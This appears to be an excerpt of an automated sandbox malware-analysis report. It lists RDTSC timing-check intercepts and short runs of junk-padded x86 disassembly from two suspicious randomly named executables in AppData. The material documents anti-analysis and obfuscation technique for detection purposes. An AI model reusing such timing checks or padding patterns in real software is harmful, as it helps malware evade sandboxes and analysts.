Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E501FD second address: 4E50203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50203 second address: 4E5023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 or ax, 1F16h 0x00000019 jmp 00007F0E948C9FC1h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5037C second address: 4E50383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50383 second address: 4E503FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 408Bh 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC5h 0x00000018 sbb si, 6786h 0x0000001d jmp 00007F0E948C9FC1h 0x00000022 popfd 0x00000023 popad 0x00000024 je 00007F0F06998208h 0x0000002a jmp 00007F0E948C9FBEh 0x0000002f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000036 jmp 00007F0E948C9FC0h 0x0000003b je 00007F0F069981F3h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E503FA second address: 4E503FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E503FE second address: 4E50404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50404 second address: 4E5044E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F0E94F51A50h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F0E94F51A50h 0x00000019 test edx, 61000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5044E second address: 4E50452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50452 second address: 4E50458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E408B1 second address: 4E408EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC4h 0x00000014 jmp 00007F0E948C9FC5h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E408EA second address: 4E40939 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E94F51A50h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bx, 8E66h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Ch 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f add ch, FFFFFFC6h 0x00000022 jmp 00007F0E94F51A51h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40939 second address: 4E4094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4094D second address: 4E40960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40AE2 second address: 4E40B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 je 00007F0F0699F84Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0E948C9FC7h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B2E second address: 4E40B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0E94F51A4Ch 0x00000017 sbb ch, FFFFFFD8h 0x0000001a jmp 00007F0E94F51A4Bh 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 jne 00007F0F0702728Ah 0x00000029 pushad 0x0000002a push esi 0x0000002b mov bl, 80h 0x0000002d pop esi 0x0000002e popad 0x0000002f mov edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F0E94F51A4Bh 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx edx, ax 0x0000003e push ecx 0x0000003f pop edx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B96 second address: 4E40B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B9C second address: 4E40BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BAB second address: 4E40BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BAF second address: 4E40BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BC2 second address: 4E40BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, CFBEh 0x00000011 jmp 00007F0E948C9FBFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40CF9 second address: 4E40D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D09 second address: 4E40D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D0D second address: 4E40D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F0E94F51A57h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D34 second address: 4E40D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D38 second address: 4E40D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D53 second address: 4E40D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D59 second address: 4E40D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D5D second address: 4E40D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D61 second address: 4E40DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A58h 0x00000013 xor si, 3548h 0x00000018 jmp 00007F0E94F51A4Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0E94F51A58h 0x00000024 sbb esi, 649DF7A8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DC4 second address: 4E40DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DCA second address: 4E40DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DCE second address: 4E40DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx edi, cx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DD1 second address: 4E50DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DD7 second address: 4E50DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DF7 second address: 4E50DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DFB second address: 4E50E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E01 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E94F51A58h 0x00000008 pop ecx 0x00000009 jmp 00007F0E94F51A4Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F0E94F51A59h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0E94F51A4Eh 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 mov bl, D6h 0x00000023 pop ecx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E5E second address: 4E50E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E6C second address: 4E50E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 44D57068h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E76 second address: 4E50E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B4E second address: 4E50B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B60 second address: 4E50B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B64 second address: 4E50B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push esi 0x00000013 push edi 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 mov al, D3h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0E94F51A53h 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B9D second address: 4E50BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0289 second address: 4EC02A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02A2 second address: 4EC02A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02A8 second address: 4EC02AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02AC second address: 4EC02B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02B0 second address: 4EC02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02BF second address: 4EC02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02C3 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02D9 second address: 4EC030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, C6h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A51h 0x00000015 jmp 00007F0E94F51A4Bh 0x0000001a popfd 0x0000001b movzx esi, bx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC030A second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E601E0 second address: 4E601E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E601E8 second address: 4E60219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a movsx edx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC06F8 second address: 4EC06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC06FE second address: 4EC074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F0E948C9FBDh 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov si, C06Dh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d call 00007F0E948C9FC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC074A second address: 4EC07BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edx, 78C2B0E4h 0x0000000a popad 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A59h 0x00000015 sub ax, 2FD6h 0x0000001a jmp 00007F0E94F51A51h 0x0000001f popfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 popad 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edi, si 0x0000002f call 00007F0E94F51A56h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC07BC second address: 4EC07D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC07D7 second address: 4EC0805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F0E94F51A49h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0805 second address: 4EC0818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0818 second address: 4EC085D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A4Ah 0x00000013 jmp 00007F0E94F51A55h 0x00000018 popfd 0x00000019 push esi 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC085D second address: 4EC0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0863 second address: 4EC0867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0867 second address: 4EC08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 call 00007F0E948C9FBFh 0x00000015 pushfd 0x00000016 jmp 00007F0E948C9FC8h 0x0000001b xor esi, 52B44698h 0x00000021 jmp 00007F0E948C9FBBh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 jmp 00007F0E948C9FC9h 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0E948C9FC3h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC08EF second address: 4EC090C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC090C second address: 4EC0933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4D17 second address: 5C4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F30 second address: 5B8F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F39 second address: 5B8F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F43 second address: 5B8F49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F49 second address: 5B8F6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E94F51A55h 0x0000000d jne 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D32 second address: 5C3D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D36 second address: 5C3D3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D3F second address: 5C3D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E948C9FC0h 0x0000000c jmp 00007F0E948C9FBEh 0x00000011 rdtsc
